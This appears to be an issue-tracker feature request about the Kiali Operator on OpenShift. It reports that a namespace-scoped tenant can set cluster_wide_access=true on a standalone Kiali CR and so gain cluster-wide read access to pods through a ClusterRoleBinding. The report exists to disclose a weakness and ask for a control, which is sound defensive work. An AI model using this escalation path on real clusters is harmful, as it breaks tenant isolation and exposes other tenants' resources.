-
Feature Request
-
Resolution: Unresolved
-
Normal
-
None
-
openshift-4.16
-
None
-
Product / Portfolio Work
-
None
-
False
-
-
None
-
None
-
None
-
-
None
-
None
-
None
-
None
-
None
1. Proposed title of this feature request
allow cluster-admins to control whether kiali_cr.spec.cluster_wide_access=true is usable in a cluster and/or by whom
2. What is the nature and description of the request?
CONTEXT/BACKGROUND:
We employ a specific multitenancy model on our clusters - "namespace(s) as a service".
In practice, we create one or more namespaces for a tenant and make the tenant an admin in those namespaces (by binding ClusterRole/admin with RoleBinding(s)).
The tenant receives only the aforementioned RBAC permissions and none other.
They cannot (and must not) access any resources outside of their allocated namespace(s), especially not other tenants' namespaces.
Furthermore, we still operate with OpenShift ServiceMesh v2.6.11 (OSSMv2).
If a tenant (hereinafter called) A needs a Kiali instance, they get one by setting the_servicemeshcontrolplane_of_tenant_a.spec.addons.kiali.enabled=true.
Put differently, all Kiali CRs in a cluster are managed via ServiceMeshControlPlanes (SMCPs), our tenants do not create standalone Kiali CRs.
Luckilly, OSSMv2 populates managed_kiali_cr_of_tenant_a.spec.deployment.accessible_namespaces="list of namespaces of tenant A which they included in their service mesh".
As a consequence, the ClusterRole/kiali-reader gets bound only in the above namespaces and only with RoleBindings.
ACTUAL PROBLEM:
If tenant A decides to create a standalone Kiali CR in one of their namespaces (does not even have to be a mesh-member one), let us call it namespace X.
Currently*, nothing will prevent tenant A to set standalone_kiali_cr_of_tenant_a.spec.cluster_wide_access=true, which leads to:
a Kiali-related ServiceAccount in namespace X gets bound ClusterRole/kiali-viewer with a ClusterRoleBinding!
Tenant A can now use the above SA, for instance, to list all pods in all namespaces on the cluster, way beyound what they should be allowed to do.
Notes:
*We are using Kiali Operator v2.17.1 provided by RedHat via OperatorHub, but had also been able to reproduce the issue with v2.11.4 previously.
In general, the issue should be reproducible in all versions of the Kiali Operator (provided by Red Hat) currently available via OperatorHub.
3. Why does the customer need this? (List the business requirements here)
Currently, the Kiali Operator (provided by Red Hat via OperatorHub) is not multitenant-ready or, at least, it does not support our multitenancy approach, namely the aforementioned "namespace(s) as a service".
4. List any affected packages or components.
All versions of the Kiali Operator (provided by Red Hat) currently available in OperatorHub.